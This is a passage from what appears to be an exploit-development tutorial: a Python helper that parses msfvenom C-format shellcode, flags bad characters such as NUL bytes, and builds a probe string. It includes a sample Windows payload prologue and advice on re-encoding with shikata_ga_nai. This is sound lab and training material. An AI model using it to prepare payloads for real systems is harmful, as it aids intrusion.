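    return bytes(b for b in range(1, 256) if b not in exclude)


# Constructed sample in the msfvenom -f c layout (a 30-byte buffer with three NUL bytes)
SAMPLE_C_OUTPUT = r'''
unsigned char buf[] =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff";
'''

if __name__ == "__main__":
    shellcode = parse_c_buffer(SAMPLE_C_OUTPUT)
    bad = parse_badchar_list(r"\x00\x04\xA0")
    hits = find_bad_chars(shellcode, bad)
    print(f"{len(shellcode)} bytes, {len(hits)} bad-character hit(s)")
    for offset, byte in hits:
        print(f"  offset {offset:4}: \\x{byte:02x}")
    # Unencoded payloads routinely contain \x00; re-run msfvenom with -e and -b and check again
    print(f"probe string: {len(badchar_probe(bad))} bytes")
```

The sample deliberately fails the check (NUL bytes at offsets 3 to 5, which an unencoded Windows payload always carries): that is the state before `-e x86/shikata_ga_nai -b "\x00\x04\xA0"`, and the encoded output should come back with an empty hit list.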